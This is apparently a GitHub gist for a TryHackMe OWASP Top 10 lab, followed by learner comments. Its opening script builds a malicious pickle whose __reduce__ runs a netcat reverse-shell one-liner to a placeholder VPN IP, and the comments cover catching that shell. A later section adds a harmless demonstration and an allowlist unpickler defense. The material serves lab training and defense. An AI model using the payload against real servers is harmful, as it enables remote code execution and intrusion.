```python
import pickle
import base64

# Reverse-shell one-liner that the deserialized object will hand to os.system.
# Replace YOUR_TRYHACKME_VPN_IP with the tun0 address of the machine running the listener.
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'

class rce(object):
    # pickle calls __reduce__ when serializing; the (callable, args) tuple it returns
    # is replayed by pickle.loads() on the server, so os.system(command) runs there.
    def __reduce__(self):
        import os
        return (os.system, (command,))

# Serialize the object and base64-encode it: this is the value for the encodedPayload cookie/header.
print(base64.b64encode(pickle.dumps(rce())))
```
If anyone is on here with the same problem as debassanta, and you're using the THM AttackBox, nc won't pick up anything. What I had to do was set up a Kali on windows and then go through that. No idea why that worked. But it did.
Please, I'm stuck here for several days and don't know what I'm doing wrong. I have tried listening with nc on both ports (nc -lvnp 4444 and nc -lvnp 1234) and refreshing the browser, no luck. I connected to the machine using the THM browser machine to Kali. Also I don't seem to get/find the VPN IP. Please, I need your help.
Thanks
Put ifconfig in the console on your Kali machine (it should be the eth0 controller with an IP of 10.10.something) and use that in the script. Hope it helps!
Hi, thanks for the reply. It worked.
Thanks Mate, this works fine.
Arigato!
Thank you so much! Awesome room
Thanks mate!
Love that room! So much fun, so much knowledge ;)
The room is really nice but the shell to the listener doesn't work.
Thanks room! I am trying
This is a great room, and I have tried this on a kali machine as well as a remote linux mint connected on the VPN and I'm getting a 504 timeout error...is it possible that the VPN is hosing up the connection? Great room tho!
Cool room. Do not call your python script pickle.py :)
Hi, so I got to the shell. How do I locate the flag.txt? I can only see requirements.txt.
I believe that you have removed rce.py with your last revision
Thanks @silv3rmat I have updated it. For some reason a VScode extension seems to be overwriting this gist -- I have disabled the extension for the meantime.
Good! I've got a bit surprised seeing all those json files instead of one python file. I've never used gists before so I thought that maybe I am supposed to build this file out of the jsons :D Anyways, great room. Thanks!
Still not showing the py file. For those who don't know, scroll to the top and select "Revisions" and you can find it there if it's still not showing.
Thank for this room. It's a big one, but good introduction to a lot of interesting concepts.
Thank you for this room man! It really helped me :)
Thanks for your work on this room!
I am stuck on this. Any help would be great!!! Initially I was running Kali on a VM via Windows 10 and VM Player, so I used port 4444 and then switched to 1234; nc is not hearing anything. Redid the steps multiple times to no avail, then switched over to the THM Attack Machine, and still getting the same issue. Note: used openvpn to connect using the THM VPN config file when using VM Player, stopped openvpn when switching to the THM attack machine. :-( Help please!
Thanks man, awesome room
Looks like your vscode has overwritten this gist again.
As someone paying for tryhackme I feel like maybe they should host this on AWS instead of a github link that seems to keep getting overwritten. I've been working through some of the rooms and they're riddled with errors and incomplete teachings on top of this.
Anyone seeing JSON files and wondering about the rce.py
You can find it in the 'Revisions' tab
Nice room, incredible !
Hey there, I think the required code has been overwritten; had to go back in revisions to get it.
yep same here
Do not use Windows to run the py file; the payload includes OS info.
Had the same issue.
Look at the very end of the page.
https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3/revisions
@CMNatic Really loved the room, if anyone has trouble with the code I would recommend Learn Python 3 The Hard Way, it touches literally on everything the piece of python code does. We literally encode the commands for the reverse shell to a bytes like object which is then encoded in the base64 format. We take the encoded output, place it in the encodedPayload header and send it on its way. Since the Flask app does not have any sanitization and trusts all user input, it interprets this (performs deserialization) on the backend which allows us to get our reverse shell by interpreting the commands encoded.
It is really nice seeing everything coming together, amazing room, probably my favorite by far.
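The comment above describes the mechanism the gist relies on: pickle.loads() replays whatever callable an object's __reduce__ named, so a Flask endpoint that unpickles a header it receives from the client runs attacker-chosen code. The example below is added here and is not part of the gist or the room; it shows the same __reduce__ trick pointed at a harmless, constructed function (record_call, Marker are names chosen for this example), the vulnerable load path, and one mitigation a server could use: a subclass of pickle.Unpickler whose find_class() hook refuses to resolve any global that is not on an allowlist. The allowlist is left empty on purpose, because plain dicts, lists and strings pickle without any global reference, so ordinary session data still loads while anything naming a function is rejected.

```python
# Added example (not from the gist): why unpickling untrusted input runs code,
# and how an allowlist unpickler blocks it while still loading plain data.
import base64
import io
import pickle

# Benign side-effect log standing in for the os.system call the gist's payload uses.
CALLS = []

def record_call(arg):
    """Stand-in callable: proves pickle.loads() invokes whatever __reduce__ names."""
    CALLS.append(arg)
    return arg

class Marker:
    """Same trick as the gist's rce class, pointed at a harmless function."""
    def __reduce__(self):
        return (record_call, ("reduce ran during loads",))

def encode(obj):
    """Serialize the way the gist does: pickle, then base64 (the header value)."""
    return base64.b64encode(pickle.dumps(obj)).decode()

def unsafe_load(encoded):
    """What the vulnerable endpoint does: trust the header and unpickle it verbatim."""
    return pickle.loads(base64.b64decode(encoded))

class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist unpickler. Plain containers and strings need no globals, so an
    empty allowlist still loads ordinary session data but refuses any callable."""
    ALLOWED = set()  # add ("module", "name") pairs only for types you control

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve global {module}.{name}")

def check_payload(encoded):
    """Hardened handler: returns ('accepted', obj) or ('rejected', reason)."""
    try:
        obj = RestrictedUnpickler(io.BytesIO(base64.b64decode(encoded))).load()
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))
    return ("accepted", obj)

if __name__ == "__main__":
    payload = encode(Marker())                      # constructed, harmless payload
    print("unsafe:", unsafe_load(payload), CALLS)   # record_call ran during loads
    print("restricted:", check_payload(payload))    # rejected before anything ran
    print("plain data:", check_payload(encode({"user": "alice", "roles": ["viewer"]})))
```

The rejection happens when the unpickler meets the GLOBAL opcode, before the callable is ever invoked, which is why CALLS grows only on the unsafe path. A stricter fix is to stop accepting pickle from clients altogether and use a data-only format such as JSON; the allowlist is the option when the format cannot be changed.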
The OWASP 10 room is very cool. Thanks!
FYI 'can't access tty; job control turned off' isn't an error, it simply means that you can't use ctrl-c to kill the terminal. Use ls and cd commands to look for flag.txt, because you are probably in a terminal by now. Hope that isn't giving too much away.